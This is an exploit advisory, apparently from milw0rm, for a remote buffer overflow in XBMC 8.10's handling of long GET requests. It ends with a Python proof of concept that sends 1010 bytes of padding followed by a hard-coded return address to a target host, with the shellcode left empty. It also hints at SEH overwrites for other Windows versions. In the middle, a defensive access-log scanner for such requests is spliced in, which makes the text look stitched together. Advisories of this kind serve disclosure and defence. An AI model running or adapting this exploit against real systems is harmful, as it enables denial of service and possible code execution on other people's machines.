XBMC 8.10 GET request remote buffer overflow
Tested: Win XP SP2 Eng
Release date: April 1st, 2009
Linux, Windows (tested)
Other versions are also possibly affected.
Restrictions: bad chars need to be filtered.
This exploit happens when parsing an overly long GET request. We can gain
control of the EIP register: the next 4 bytes of our user-supplied data
(the bytes that follow the padding) are copied into it.
The 3 buffer overflows I found in XBMC have nothing in common; they are
3 separate overflows. Please see the PoC code for further analysis.
I tried to evade the filtering when passing the shellcode
by loading it into the other fields that were available.
We are also able to overwrite the exception handlers, so
creating a reliable exploit for Vista and XP SP3 shouldn't
be too hard; have a look, there are some modules loaded
without /SafeSEH.
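From the defender's side, the trait the advisory describes (a request target of roughly a thousand bytes, made of one repeated padding byte followed by an address and payload) is easy to pick out of ordinary web-server access logs. The following scanner is an added example, not part of the advisory or of XBMC; the log lines are constructed in Common Log Format, and the length threshold, run length and the Apache-style `\xNN` escaping of non-printable bytes are assumptions about the monitored host.

```python
import re

# Constructed sample access-log lines (Common Log Format); not taken from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2009:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Apr/2009:12:00:01 +0000] "GET /' + 'A' * 1010 + 'BBBB HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Apr/2009:12:00:02 +0000] "GET /remote/status?cmd=volume HTTP/1.1" 200 44',
    '10.0.0.8 - - [01/Apr/2009:12:00:03 +0000] "GET /\\xeb\\x06\\x90\\x90 HTTP/1.1" 400 0',
]

MAX_TARGET_LEN = 512   # assumption: longest legitimate request target on this host
MAX_RUN = 64           # assumption: one byte repeated this often is padding, not a path

# ip, timestamp, method, request target and status from a CLF line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)
# a single character repeated MAX_RUN or more times in a row
RUN_RE = re.compile(r'(.)\1{%d,}' % (MAX_RUN - 1))
# Apache-style escaping of non-printable bytes in the logged request line
ESC_RE = re.compile(r'\\x[0-9a-fA-F]{2}')


def analyse_line(line):
    """Return a dict with the client ip, target length and a list of reasons
    the request looks like an overflow attempt (empty list means benign)."""
    m = LOG_RE.match(line)
    if not m:
        return {'ip': None, 'target_len': None, 'reasons': ['unparseable log line']}
    target = m.group('target')
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append('request target is %d bytes, limit %d' % (len(target), MAX_TARGET_LEN))
    run = RUN_RE.search(target)
    if run:
        reasons.append('run of %d x %r (padding)' % (len(run.group(0)), run.group(1)))
    escapes = ESC_RE.findall(target)
    if escapes:
        reasons.append('%d escaped non-printable bytes in target' % len(escapes))
    return {'ip': m.group('ip'), 'target_len': len(target), 'reasons': reasons}


def scan(lines):
    """Return the analysis of every line that raised at least one reason."""
    return [r for r in (analyse_line(l) for l in lines) if r['reasons']]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ip'], hit['target_len'], '; '.join(hit['reasons']))
```

Run it against a real log with `scan(open(path).read().splitlines())`; tune `MAX_TARGET_LEN` to the longest path the application legitimately serves, since the length check alone will false-positive on long query strings, while the padding-run and escaped-byte checks are what single out an overflow attempt.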
Credits to n00b for finding the buffer overflow and writing
the PoC code and exploit.
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only!
import struct
import sys
import socket

port = 80
host = sys.argv[1]          # target host is the first command-line argument

Junk_buffer = b'A' * 1010   # padding up to the saved return address
Jump_esp = struct.pack('<L', 0x77F84143)   # return address used by the advisory (Win XP SP2 Eng)
Shell_code = b''            # not included in the advisory; left empty, so this only crashes the service

# create a socket object called 'c' and connect to the target
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((host, port))

# build the overly long request target
Request = Junk_buffer + Jump_esp + Shell_code

# send the GET request to the server
c.sendall(b"GET /" + Request + b" HTTP/1.1\n\n")
c.close()
# milw0rm.com [2009-04-01]